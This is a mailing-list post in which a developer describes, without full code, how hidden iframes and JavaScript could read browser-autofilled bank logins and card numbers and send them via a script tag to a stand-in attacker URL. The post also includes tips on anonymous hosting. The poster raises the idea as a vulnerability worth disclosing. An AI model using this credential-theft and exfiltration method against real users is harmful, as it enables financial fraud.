I was wondering if anyone here knew that this was possible and that it,
according to some sources that this is one of the reasons it wasn't
implemented in chrome:
I thought of this over two years ago; yet, never did anything with it
(lazy... really lazy... plus I am not criminal).
Flash banners that inject javascript, xss exploited forms, or outright
malicious websites, can place hidden iframes that load a bunch of bank
login sites, and using javascript take advantage of auto complete form
fill functions that require no user interaction, by reading the value of
the input fields. Once you have the user's card# or login and pass, you
can dynamically create and load a script tag with the src set to
http://your_free_geocities_site_with_false_hotmail_signin_info/trackinfo.php?bankid=blah&bankcard=blah&pass=blah
and you have sent the data to a remote location. If interaction is
required for the auto complete function to work, get javascript to cycle
through the ascii and cycle focus back and forth from the field till
their is a value change.
The user would of course signed up for a hotmail account, through a
proxy, and used that hotmail account to setup a geocities account. I
know this wouldn't get everyone; yet, if you put it on a linkshare site,
I am betting a hacker could just watch the collected info pour in.
I got it to work on my laptop for a locally hosted site, (on I won't
tell with what browser and what parameters) and I am thinking about
submitting a proof of concept; yet, I am wondering if anyone else wrote
about this first, if I just missed it, and if there is someone else's
proof of concept it would look like I was ripping off?
_______________________________________________
Flashcoders mailing list
Flashcoders@chattyfig.figleaf.com
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
